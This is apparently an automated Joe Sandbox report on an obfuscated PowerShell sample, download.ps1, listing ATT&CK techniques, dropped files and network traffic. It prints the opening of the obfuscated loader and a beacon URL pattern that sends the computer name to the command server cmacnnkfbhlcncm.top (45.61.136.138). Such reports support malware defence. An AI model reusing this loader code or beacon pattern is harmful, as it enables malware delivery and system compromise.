Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps111%ReversingLabs
download.ps113%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.64.132
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E5592000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://go.micropowershell.exe, 00000000.00000002.137575649447.00000230E53AC000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaApowershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngXzp#powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzp#powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/PesterXzp#powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVpowershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E42C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.google.compowershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.quovadis.bm0powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micrpowershell.exe, 00000000.00000002.137611950798.00000230FB500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                45.61.136.138
                                                                cmacnnkfbhlcncm.topUnited States
                                                                40676AS40676USfalse
                                                                142.250.64.132
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579457
                                                                Start date and time:2024-12-22 13:46:04 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 34s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:4
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal72.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 12
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 4572 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                TimeTypeDescription
                                                                07:48:10API Interceptor29x Sleep call for process: powershell.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                • 107.160.112.122
                                                                QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                • 107.160.131.254
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.740717034202746
                                                                Encrypted:false
                                                                SSDEEP:48:ANmrkTZCrZUU8ZaukvhkvklCyw++DHM8WxxDFSogZobljHM8WxxiFSogZobhA:OdTZCrGBdkvhkvCCtBHJWxGH6HJWx1HX
                                                                MD5:10228F8A5DE743983C6381C9D5F4DA18
                                                                SHA1:12DBE46EFDC737FA543F01DCCE1CA030FE04EE55
                                                                SHA-256:601DF609338BC9D9952266953BE1BE14A5FF473413B07C1011BCEF785B42A609
                                                                SHA-512:B9886606DC9AEDBF9DE3E24F731EC994242A4F6A9F09381932ADAE4353F4B1248C4E91EEC620809813F71F745B5B5A0750819D4A4F7D9C6F569FF31F02A85F1B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S.......oT..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...a/..oT..k...oT......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.e....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.f..Roaming.@......"S.Y.f....D....................._...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.e....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.5..Windows.@......"S.Y.e....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.5....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.5....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yj.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.f....i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.740717034202746
                                                                Encrypted:false
                                                                SSDEEP:48:ANmrkTZCrZUU8ZaukvhkvklCyw++DHM8WxxDFSogZobljHM8WxxiFSogZobhA:OdTZCrGBdkvhkvCCtBHJWxGH6HJWx1HX
                                                                MD5:10228F8A5DE743983C6381C9D5F4DA18
                                                                SHA1:12DBE46EFDC737FA543F01DCCE1CA030FE04EE55
                                                                SHA-256:601DF609338BC9D9952266953BE1BE14A5FF473413B07C1011BCEF785B42A609
                                                                SHA-512:B9886606DC9AEDBF9DE3E24F731EC994242A4F6A9F09381932ADAE4353F4B1248C4E91EEC620809813F71F745B5B5A0750819D4A4F7D9C6F569FF31F02A85F1B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S.......oT..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...a/..oT..k...oT......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.e....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.f..Roaming.@......"S.Y.f....D....................._...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.e....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.5..Windows.@......"S.Y.e....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.5....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.5....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yj.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.f....i...........
                                                                File type:ASCII text, with very long lines (10807), with CRLF line terminators
                                                                Entropy (8bit):5.967537423142359
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:20'400 bytes
                                                                  MD5:f710ad70e1fe42d5174f289867a61f93
                                                                  SHA1:5d2c8485c88fef6f88db24094b6b39f1628825a7
                                                                  SHA256:d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
                                                                  SHA512:7ed8d3e11da5c1f5b0f86190e852ce9e3fa98c07101c22110f108c7a4bf1339a6b4f696bc35a309d0c9542ec464580962dc08ebeb52620c63387c48b7a566f11
                                                                  SSDEEP:384:ydnyLO8CeZInjVd9bhy2WjuyV1ljr7pwL8f4nqfxnTCtxn:ydyS3eZUdxnk1lqL8wnqJy
                                                                  TLSH:33925CA17B84E8E4C29AC23F5607FC183B6A753BD0DBBBC4F658D6D163916112E8DC80
                                                                  File Content Preview:$yfnvsdrmbckahu=$executioncontext;$edinbereonreenarateran = ([ChAR[]]@((-9940+(15808-(54346990/(13314-(-160+(19740096/4782)))))),(-3882+(9853-5919)),(6133-(156+(10342-(12421-(8910886/(-5446+6560)))))),(-9511+(4532+5029)),(2970-2914),(-285+(-5554+(7623-173
                                                                  Icon Hash:3270d6baae77db44
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-22T13:48:12.044137+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20589561.1.1.153UDP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 22, 2024 13:48:12.705257893 CET4975280192.168.11.2045.61.136.138
                                                                  Dec 22, 2024 13:48:12.897144079 CET804975245.61.136.138192.168.11.20
                                                                  Dec 22, 2024 13:48:12.897391081 CET4975280192.168.11.2045.61.136.138
                                                                  Dec 22, 2024 13:48:12.900171995 CET4975280192.168.11.2045.61.136.138
                                                                  Dec 22, 2024 13:48:13.091917038 CET804975245.61.136.138192.168.11.20
                                                                  Dec 22, 2024 13:48:13.118683100 CET804975245.61.136.138192.168.11.20
                                                                  Dec 22, 2024 13:48:13.165486097 CET4975280192.168.11.2045.61.136.138
                                                                  Dec 22, 2024 13:48:13.251040936 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:13.380287886 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:13.380436897 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:13.380505085 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:13.509507895 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:13.862020016 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:13.862046957 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:13.862185001 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:13.863940954 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:13.993248940 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:14.007707119 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:14.007796049 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:14.008011103 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:14.008057117 CET8049753142.250.64.132192.168.11.20
                                                                  Dec 22, 2024 13:48:14.055896997 CET4975380192.168.11.20142.250.64.132
                                                                  Dec 22, 2024 13:48:14.103164911 CET4975280192.168.11.2045.61.136.138
                                                                  Dec 22, 2024 13:48:14.103238106 CET4975380192.168.11.20142.250.64.132
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 22, 2024 13:48:12.044137001 CET5895653192.168.11.201.1.1.1
                                                                  Dec 22, 2024 13:48:12.697135925 CET53589561.1.1.1192.168.11.20
                                                                  Dec 22, 2024 13:48:13.120297909 CET6195853192.168.11.201.1.1.1
                                                                  Dec 22, 2024 13:48:13.249946117 CET53619581.1.1.1192.168.11.20
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 22, 2024 13:48:12.044137001 CET192.168.11.201.1.1.10x245cStandard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                  Dec 22, 2024 13:48:13.120297909 CET192.168.11.201.1.1.10x6768Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 22, 2024 13:48:12.697135925 CET1.1.1.1192.168.11.200x245cNo error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                  Dec 22, 2024 13:48:13.249946117 CET1.1.1.1192.168.11.200x6768No error (0)www.google.com142.250.64.132A (IP address)IN (0x0001)false
                                                                  • cmacnnkfbhlcncm.top
                                                                  • www.google.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.204975245.61.136.138804572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 22, 2024 13:48:12.900171995 CET215OUTGET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: cmacnnkfbhlcncm.top
                                                                  Connection: Keep-Alive
                                                                  Dec 22, 2024 13:48:13.118683100 CET166INHTTP/1.1 302 Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sun, 22 Dec 2024 12:48:13 GMT
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Location: http://www.google.com


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.2049753142.250.64.132804572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 22, 2024 13:48:13.380505085 CET159OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Connection: Keep-Alive
                                                                  Dec 22, 2024 13:48:13.862020016 CET1289INHTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIjZWguwYQpLTW9gISBGaBmM0
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-zMJWBj4vefz0aXLaQwGHnw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Sun, 22 Dec 2024 12:48:13 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Set-Cookie: AEC=AZ6Zc-Xh7-1d4hdO6exZMPOUClJFoTnOZb4aZO1D-sloy_ISBKHHRWkbzzM; expires=Fri, 20-Jun-2025 12:48:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
